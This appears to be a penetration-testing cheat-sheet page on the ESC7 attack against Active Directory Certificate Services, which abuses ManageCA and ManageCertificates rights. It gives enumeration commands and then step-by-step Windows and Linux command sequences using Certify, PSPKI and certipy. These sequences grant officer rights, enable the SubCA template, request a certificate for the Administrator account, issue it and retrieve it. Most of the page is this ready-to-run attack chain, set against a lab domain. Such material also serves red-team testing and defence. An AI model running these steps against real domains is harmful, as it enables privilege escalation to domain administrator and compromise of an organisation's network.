Skip to main content

ESC7

Vulnerable Certificate Authority Access Control where 2 sets of permissions poses security risks:

  • ManageCA (or ManageCertificates)
  • ManageCertificates (or Certificate Manager)

Enumerate using certsrv.msc

PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-CertificationAuthorityAcl | select -expand Access

Query CA with certutil (EditFlags value)

Check if EDITF_ATTRIBUTESUBJECTALTNAME2 is set if the value is 1376590.

PS /home/bobbuilder> certutil.exe -config "LAB-DC.minions.com\CA-minions" -getreg "policy\EditFlags"

Enumerate using PSPKI module

PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.minions.com | Get-CertificationAuthorityAcl | select -ExpandProperty access

Windows

Attack 1 (Allow SAN by flipping EDITF_ATTRIBUTESUBJECTALTNAME2)

Templates with ManageCA enables the principal to manipulate settings remotely using PSPKI by toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (just like with ESC6). This allows SAN specification in any template. The ESC6 attack got patch on May of 2022, so Attack #2 might be a better alternative if it's the case.

Note: this will not have any effect until the CA service (CertSvc) is restarted which ManageCA users have but they can't do it remotely.

  1. Request Certificate Template
PS /home/bobbuilder> .\certify.exe request /ca:<ca_name> /template:ApprovalNeeded
  1. Import PSPKI module
PS /home/bobbuilder> Import-Module PSPKI
  1. Approve Pending Request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-PendingRequest -RequestID 1 | Approve-CertificateRequest
  1. Download Pending Request
PS /home/bobbuilder> .\certify.exe download /ca:<ca_name> /id:1
Post Attack

Disable EDITF_ATTRIBUTESUBJECTALTNAME2 with PowerShell

PS /home/bobbuilder> $ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
PS /home/bobbuilder> $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")

Attack 2 (gain ManageCertificates right using ManageCA)

For this attack we only need ManageCA permission. We will need Manage Certificates permission and SubCA Certificate template enabled but they both can be enabled from ManageCA

  1. Grant Manage Certificates access (Optional, if we don't already)
PS /home/bobbuilder> .\certipy.exe ca -ca '<ca_name>' -add-officer user1 -username user1@minions.com -password password1
  1. Enable SubCA Certificate template (Optional, The SubCA template is enabled by default)
PS /home/bobbuilder> .\certipy.exe ca -username user1@minions.com -password password1 -target-ip <ip> -ca '<ca_name>' -enable-template 'SubCA'
  1. Request certificate based on the SubCA template
PS /home/bobbuilder> .\certipy.exe req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -template SubCA -upn administrator@minions.com
  1. Issue the failed certificate
PS /home/bobbuilder> .\certipy.exe ca -ca '<ca_name>' -issue-request 1 -username user1@minions.com -password password1
  1. Retrieve the issued certificate
PS /home/bobbuilder> .\certipy.exe req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -retrieve 1

Linux

Attack 1 (ManageCA rights)

  1. Add Manage Certificates Access rights to BlWasp
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -add-officer user1
  1. Requesting a certificate with SAN (Enrollee Supplies Subject : True)
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template SubCA -upn Administrator
  1. Issue the certificate
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -issue-request 1
  1. Retrieve the certificate with the ID to authenticate using it
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -retrieve 1

Attack 2 (ManageCertificates rights)

  1. Request a certificate with the manager's approval
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template <template> -upn Administrator
  1. Approve pending request
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -issue-request 1

  1. Retrieve approved request
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -retrieve 1